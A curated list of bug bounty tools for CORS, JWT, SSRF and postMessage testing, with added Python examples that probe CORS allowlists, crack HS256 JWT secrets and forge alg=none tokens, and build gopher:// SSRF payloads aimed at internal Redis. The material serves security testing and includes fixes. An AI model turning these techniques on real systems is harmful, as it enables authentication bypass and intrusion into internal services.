

Awesome Bug Bounty Tools

Curated list of various bug bounty tools




CORS Misconfiguration


  • Corsy - CORS Misconfiguration Scanner
  • CORStest - A simple CORS misconfiguration scanner
  • cors-scanner - A multi-threaded scanner that helps identify CORS flaws/misconfigurations
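What the scanners above actually do is send a series of crafted Origin headers and look at how Access-Control-Allow-Origin and Access-Control-Allow-Credentials come back. The following is an added example, not code from Corsy, CORStest or cors-scanner: it builds the usual probe origins for a target and classifies each response. The server is a constructed stand-in with a deliberately sloppy suffix check so the whole thing runs offline; `attacker.example` is a hypothetical domain.

```python
"""Origin probing and response classification for CORS misconfiguration testing.

Added example (not Corsy's, CORStest's or cors-scanner's code). `vulnerable_server`
is a constructed stand-in for a real target; replace `respond` with an HTTP
round-trip to use the same probes against a live host.
"""
from urllib.parse import urlsplit

# Hypothetical attacker-controlled domain used only to build probe origins.
ATTACKER_DOMAIN = "attacker.example"


def probe_origins(target_url, attacker_domain=ATTACKER_DOMAIN):
    """Origins that tell an exact-match allowlist apart from sloppy checks."""
    parts = urlsplit(target_url)
    scheme, host = parts.scheme, parts.hostname
    return {
        "arbitrary": f"https://{attacker_domain}",                   # no check at all
        "null": "null",                                               # sandboxed iframes, data: URLs
        "prefix": f"{scheme}://{host}.{attacker_domain}",             # startswith() / unanchored regex
        "suffix": f"{scheme}://evil{host}",                           # endswith() without a leading dot
        "unescaped_dot": f"{scheme}://{host.replace('.', 'x', 1)}",   # regex with an unescaped '.'
        "http_downgrade": f"http://{host}",                           # scheme not checked
    }


def classify(origin, headers):
    """Summarise what the response grants to `origin` from its CORS headers."""
    h = {k.lower(): v for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").strip().lower() == "true"
    if acao is None:
        return "not allowed"
    if acao == "*":
        # Browsers refuse to send credentials to a '*' origin, so this only
        # exposes responses that are readable anonymously anyway.
        return "wildcard"
    if acao == origin:
        return "reflected+credentials" if creds else "reflected"
    return "not allowed"


def vulnerable_server(origin):
    """Constructed stand-in: reflects any Origin that merely ends in 'example.com'."""
    if origin and origin.endswith("example.com"):
        return {
            "Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true",
        }
    return {}


def scan(target_url, respond=vulnerable_server):
    """Send every probe origin through `respond` and classify each answer."""
    return {name: classify(o, respond(o)) for name, o in probe_origins(target_url).items()}


if __name__ == "__main__":
    for name, verdict in scan("https://app.example.com").items():
        print(f"{name:15} {verdict}")
```

Only the probes that a correct exact-match allowlist would reject matter: a reflected origin with credentials for the `suffix`, `unescaped_dot` or `arbitrary` probe means an attacker page can read authenticated responses; `http_downgrade` means a network attacker can do the same.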

JSON Web Token


  • jwt_tool - A toolkit for testing, tweaking and cracking JSON Web Tokens
  • c-jwt-cracker - JWT brute force cracker written in C
  • jwt-heartbreaker - Burp extension that checks whether a JWT (JSON Web Token) is signed with a key known from public sources
  • jwtear - Modular command-line tool to parse, create and manipulate JWT tokens for hackers
  • jwt-key-id-injector - Simple Python script to test for a hypothetical JWT key ID (kid) injection vulnerability
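The two checks these tools automate most often are a dictionary attack on an HS256 secret and the `alg: none` signature bypass. The following is an added example, not code from jwt_tool, c-jwt-cracker or jwtear: it encodes and decodes tokens with the standard library, cracks a weak secret from a wordlist, forges an unsigned token, and shows a verifier that pins the algorithm so the forgery fails. The token, secret and wordlist are constructed for the example.

```python
"""JWT HS256 dictionary attack and alg=none forgery, with a strict verifier.

Added example; not the code of any tool listed above. Secrets and claims are
constructed test data.
"""
import base64
import hashlib
import hmac
import json


def b64url_decode(s):
    """Base64url without padding, as JWT uses it."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def parse_jwt(token):
    """Return (header dict, payload dict, raw signature segment)."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), s


def sign_hs256(signing_input, secret):
    return hmac.new(secret, signing_input, hashlib.sha256).digest()


def make_jwt(header, payload, secret=None):
    """Build a token; an 'alg': 'none' header yields an empty signature segment."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    if header.get("alg") == "none":
        return f"{h}.{p}."
    sig = sign_hs256(f"{h}.{p}".encode(), secret)
    return f"{h}.{p}.{b64url_encode(sig)}"


def crack_hs256(token, wordlist):
    """Recompute the HMAC for each candidate secret; return the one that matches."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    target = b64url_decode(sig_b64)
    for candidate in wordlist:
        if hmac.compare_digest(sign_hs256(signing_input, candidate.encode()), target):
            return candidate
    return None


def forge_none(token, **claims):
    """Re-issue the token with alg=none, no signature and the given claims changed."""
    header, payload, _ = parse_jwt(token)
    header["alg"] = "none"
    payload.update(claims)
    return make_jwt(header, payload)


def verify_strict(token, secret):
    """Verifier that pins the algorithm to HS256: 'none' or anything else is rejected.

    Returns the payload on success, None on any failure.
    """
    header_b64, payload_b64, sig_b64 = token.split(".")
    if json.loads(b64url_decode(header_b64)).get("alg") != "HS256":
        return None
    expected = sign_hs256(f"{header_b64}.{payload_b64}".encode(), secret)
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    token = make_jwt({"alg": "HS256", "typ": "JWT"}, {"sub": "alice", "role": "user"}, b"secret123")
    print("cracked secret:", crack_hs256(token, ["password", "admin", "secret123"]))
    forged = forge_none(token, role="admin")
    print("forged accepted by strict verifier:", verify_strict(forged, b"secret123") is not None)
```

A server that takes the algorithm from the token header is the one that accepts the forged token; the fix is exactly what `verify_strict` does, treating the expected algorithm as server-side configuration rather than attacker input.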

Server Side Request Forgery


  • SSRFmap - Automatic SSRF fuzzer and exploitation tool
  • Gopherus - Generates gopher:// payloads for exploiting SSRF against internal services and gaining RCE on various servers
  • ground-control - A collection of scripts that run on my web server. Mainly for debugging SSRF, blind XSS, and XXE vulnerabilities.
  • Gf-Patterns - gf patterns for grepping parameters associated with SSRF, RCE, LFI, SQLi, SSTI, IDOR, URL redirection, debug logic and interesting subdomains
  • SSRFire - An automated SSRF finder: give it the domain name and your callback server and wait for hits. Also has options to find XSS and open redirects
  • httprebind - Automatic tool for DNS rebinding-based SSRF attacks
  • ssrf-sheriff - A simple SSRF-testing sheriff written in Go
  • B-XSSRF - Toolkit to detect and keep track of blind XSS, XXE and SSRF
  • extended-ssrf-search - Smart SSRF scanner using different methods, such as parameter brute forcing in POST and GET requests
  • gaussrf - Fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine and Common Crawl, and filters those with open-redirect or SSRF parameters
  • ssrfDetector - Server-side request forgery detector
  • grafana-ssrf - Authenticated SSRF in Grafana
  • sentrySSRF - Tool to search for Sentry configuration on a page or in JavaScript files and check for blind SSRF
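Gopherus-style payloads rely on one property of the gopher scheme: everything after the item-type character in the path is sent verbatim to host:port, so an SSRF whose fetcher supports gopher (curl-based clients typically do) can be made to speak any line-based protocol to an internal service. The following is an added example, not Gopherus's code: it encodes a Redis command and a raw HTTP request, wraps either into a gopher URL, and decodes the URL again so a generated payload can be checked before use. Host names, ports and commands are illustrative constants.

```python
"""Wrapping raw TCP bytes into a gopher:// URL (the technique behind Gopherus).

Added example; not the project's code. Hosts, ports and commands below are
constructed for the illustration.
"""
from urllib.parse import quote, unquote_to_bytes, urlsplit


def resp_command(*args):
    """Encode a Redis command as RESP, the wire format redis-server reads."""
    out = f"*{len(args)}\r\n"
    for arg in args:
        out += f"${len(arg.encode())}\r\n{arg}\r\n"
    return out.encode()


def raw_http_request(method, path, host, body=b""):
    """Minimal HTTP/1.1 request bytes for an internal service that speaks HTTP."""
    head = (
        f"{method} {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()
    return head + body


def gopher_url(host, port, payload):
    """Percent-encode every byte; the leading '_' is the item type the client strips."""
    return f"gopher://{host}:{port}/_{quote(payload, safe='')}"


def gopher_payload(url):
    """Recover the bytes a gopher client would send, for checking a generated URL."""
    parts = urlsplit(url)
    if parts.scheme != "gopher":
        raise ValueError("not a gopher URL")
    return unquote_to_bytes(parts.path[2:])  # drop the '/' and the item-type char


if __name__ == "__main__":
    ping = resp_command("PING")
    url = gopher_url("127.0.0.1", 6379, ping)
    print(url)
    print(gopher_payload(url) == ping)
```

Because every byte is percent-encoded (`safe=''`), CR/LF pairs survive both the SSRF-bearing parameter and the gopher client untouched, which is what makes multi-line protocols like RESP and HTTP reachable through a single URL.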


postMessage

  • postMessage-tracker - A Chrome Extension to track postMessage usage (url, domain and stack) both by logging using CORS and also visually as an extension-icon
  • PostMessage_Fuzz_Tool - Tool for fuzzing postMessage handlers


Contributions welcome! Read the contribution guidelines first.



To the extent possible under law, vavkamil has waived all copyright and related or neighboring rights to this work.